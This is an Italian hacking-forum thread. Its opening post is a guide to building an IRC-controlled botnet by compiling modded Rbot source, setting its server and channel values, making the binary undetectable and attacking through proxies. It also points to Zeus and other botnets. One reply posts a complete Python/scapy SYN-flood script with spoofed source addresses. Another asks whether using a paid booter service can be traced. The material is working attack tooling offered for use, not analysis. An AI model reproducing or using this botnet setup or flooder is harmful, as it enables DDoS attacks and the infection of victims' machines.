Guida DoS Come creare una Botnet o DDosNet.

B4ckdoor

Bannato
6 Luglio 2012
855
63
390
509
Ultima modifica da un moderatore:
Creare una BotNet



Cosa è una botnet?
Una botnet è una rete di computer collegati ad internet che fanno parte di un insieme di computer controllato da un'unica entità, il botmaster. Ciò può essere causato da falle nella sicurezza o mancanza di attenzione da parte dell'utente e dell'amministratore di sistema, per cui i computer vengono infettati da virus informatici otrojan i quali consentono ai loro creatori di controllare il sistema da remoto. I controllori della botnet possono in questo modo sfruttare i sistemi compromessi per scagliare attacchi distribuiti del tipo denial-of-service (DDoS) contro qualsiasi altro sistema in rete oppure compiere altre operazioni illecite, in taluni casi agendo persino su commissione di organizzazioni criminali. I computer che compongono la botnet sono chiamati bot (da roBOT) o zombie.


Ora vediamo come crearne una:
In primo luogo bisogna scaricare questi tre tool:

1. Download Mcft Visual C++ 6.0 Standard Edition

Microsoft Visual C++ Standard Edition - CNET Download.com

Serial: edit..

2.Aprite il setup e installatelo. Poi inserite il seriale sopra elencato.

3.Scaricare e installate il Service Pack 6 per Visual Basic 6.0 , Visual C++ 6.0 con Visual Source Safe 6.0d:

http://www.microsoft.com/downloads/d...displaylang=en

4.Dopo di che scaricate e installate Windows Platform SDK:

Download: Microsoft Windows 7 SDK - Microsoft Download Center - Download Details

__________________________________________________ _______________________

Preparazione Microsoft Visual C++ 6.0
__________________________________________________ _______________________

Ora aprite Microsoft Visual C++ 6.0 , andate in Tools poi opzioni aprite la scheda Directories e sostituite le precedenti righe con queste sotto elencate nello stesso ordine senno non funziona :


C:\PROGRAMMI\MICROSOFT PLATFORM SDKC:\PROGRAMMI\MICROSOFT PLATFORM SDK\BINC:\PROGRAMMI\MICROSOFT PLATFORM SDK\INCLUDEC:\PROGRAMMI\MICROSOFT PLATFORM SDK\LIB
__________________________________________________ _________________________

Scaricate la versione moddata di Rbot 7.6 a edit

__________________________________________________ _________________________


Vai alla directory del file precedentemente scaricato, aprite il file configs.h con il blocco note (o qualsiasi altro programma di editor di testo)

E modificate queste righe:


char password[] = ""; // The password that the bot uses when .login command is enteredchar server[] = ""; // The IRC server you will host your bot(s) on to command itchar serverpass[] = ""; // A password to the IRC server if it is requiredchar channel[] = ""; // Channel in which the bot will join upon entering serverchar chanpass[] = ""; // The password of the channe

Questo e un'esempio



char password[] = "pwnt"; char server[] = "irc.landoleet.org";char serverpass[] = "lalla";char channel[] = "#bhobho"; char chanpass[] = "qual'è??";
__________________________________________________ _________________________

Ora aprite Visual Studio C++ 6.0 poi cliccate su File > Open Workspace . Sfoglia tra le cartelle del rbot e cerca il file "rBot.dsw" , una volta trovato fai doppio click su di esso .

Dopo di che ,clicca col tasto desto del mouse sulla scritta in grassetto (come nell'immagine in baso) e clicca su build:
botnetpic1.jpg


Dopo averlo compilato il progetto andate nella cartella "Debug" e li troverete il rbot.

E altamente consigliato blindare il file per renderlo irrilevabile.
E sconsigliato testare il file su di sè , e se lo aprite per sbaglio andate nella botnet ed lanciate il comando per disinfettare il bot.
Proxatevi Sempre per attaccare.

IN SEGUITO VI LASCIO ALTRE BOTNET: (IN AGGIORNAMENTO)

1-OPTIMA BOTNET
edit
2-ZEUS BOTNET (WORKING)

Se I Link Non vanno è RapidShare che sta avendo Problemi di Hosting riprovate,e dopo Un po andranno.


LINK SISTEMATI!!
 
Io la trovo improponibile, formattata malissimo e l'unica cosa che dici è cosa modificare in dei sorgenti prefatti senza spiegare ne come ne perchè.
Poi non dici che questa botnet è controllata via irc, lasci tutto ai commenti del codice che sono in inglese (lingua di cui poi ti lamenti alla fine).
Come se non bastasse, alcuni link non vanno

Pessimo lavoro
 
:quoto:Assolutamente,perché dovrei modificare le sorgenti?

Si, le sorgenti dell'acqua "Lete".

Comunque io di queste guide nella mia vita ne ho viste tante, forse troppe, arrivando alla conclusione che tu non capisci niente ne di programmazione ne di come fare una cosa del genere. Hai semplicemente trovato un qualcosa di già pronto in chi sa quale forum di "programmatori" (si credono tali..) di virus .

Veramente pietoso, scusa la franchezza. Spero tu "vada avanti" e non ti soffermi solo alla creazione, per di più a pappagallo, di virus e altre schifezze.
Cerca di prendere la programmazione seriamente e studiarla con criterio perchè ne vale la pena. Poi quando avrai imparato a programmare e visto tutte le sue potenzialità se ancora vorrai fare l'"hacker" (LOL, sempre il discorso dei programmatori) almeno saprai come farlo.
 
  • Mi piace
Reazioni: Guido78
Sistemo Link,Grazie per le segnalazioni,I Comandi sono Inutili apaprte -start e -stop :l

- - - Updated - - -

Io la trovo improponibile, formattata malissimo e l'unica cosa che dici è cosa modificare in dei sorgenti prefatti senza spiegare ne come ne perchè.
Poi non dici che questa botnet è controllata via irc, lasci tutto ai commenti del codice che sono in inglese (lingua di cui poi ti lamenti alla fine).
Come se non bastasse, alcuni link non vanno

Pessimo lavoro

TUTTI I LINK FIXATI,GRAZIE X LA SEGNALAZIONE,Scusa CAPS.
 
  • Mi piace
Reazioni: CarN
Io la trovo improponibile, formattata malissimo e l'unica cosa che dici è cosa modificare in dei sorgenti prefatti senza spiegare ne come ne perchè.
Poi non dici che questa botnet è controllata via irc, lasci tutto ai commenti del codice che sono in inglese (lingua di cui poi ti lamenti alla fine).
Come se non bastasse, alcuni link non vanno

Pessimo lavoro
:quoto:Assolutamente,perché dovrei modificare le sorgenti?
Ma poi
Vi lascio la lista dei comandi (che purtroppo e in inglese :
ma che caz..?
 
DIVERTITI MR. BACKDOOR :)
CONTINUA A VANTARTI PER IL TUO SCRIPT DEL FLOODER CON THREAD E SPOOFING, ECCO IL MIO IN PYTHON:


Codice:
from scapy.all import *
import random, sys, thread, time


def attack(ip_target, port):


    ip=IP()
    ip.src="%d.%d.%d.%d" % \
    (random.randrange(1,255),\
    random.randrange(1,255),\
    random.randrange(1,255),\
    random.randrange(1,255))


    ip.dst=ip_target
    tcp=TCP()
    tcp.sport=RandShort()
    tcp.dport=port
    tcp.flags="S"
    i=0
    
    while True:
    i+=1
    print "%d) Richiesta inviata!\n" % i
    send(ip/tcp, verbose=0)


conf.iface="wlan0"


try:


    ip=sys.argv[1]
    porta=int(sys.argv[2])
    tempo=int(sys.argv[3])
    print "\n"
    thread.start_new_thread(attack, (ip, porta,))
    time.sleep(tempo)


except IndexError:


    print "\n\nErrore: IP o Porta o Tempo non specificati!\nSintassi: python flooder.py 127.0.0.1 80 3600"
 
Ultima modifica:
Xthreme Hacking: Creare una BotNet
Come Creare Una Botnet o DDosNet.

di fonti se ne possono trovare molte... sicuro che è la tua???? non sono stato nemmeno a cercare molto... mi sono fermato a due, ora puoi mettere la fonte dato che sei stato sgammato... non sentirti hacher forse nemmeno un lamer ma un bocca di latte sicuramente se metti una guida del genere.... :D pff lol
 
Salve raga mi serve una risposta veloce, ho acquistato il servizio di stress test http://xrshellbooter.com e ora vorrei sapere se provo ad attaccare il mio sito che però non è su un mio server ma su register.it rischio qualcosa? l'attacco penso che non parte dal mio pc quindi posso poi risalire ugualmente al mio ip? se invece creo un server virtuale su aruba posso provare a dossarlo oppure quelli di aruba se ne accorgono e mi denunciano?
aspetto una risposta urgente perchè mi hanno dossato più volte il sito e ora voglio controllare se è sicuro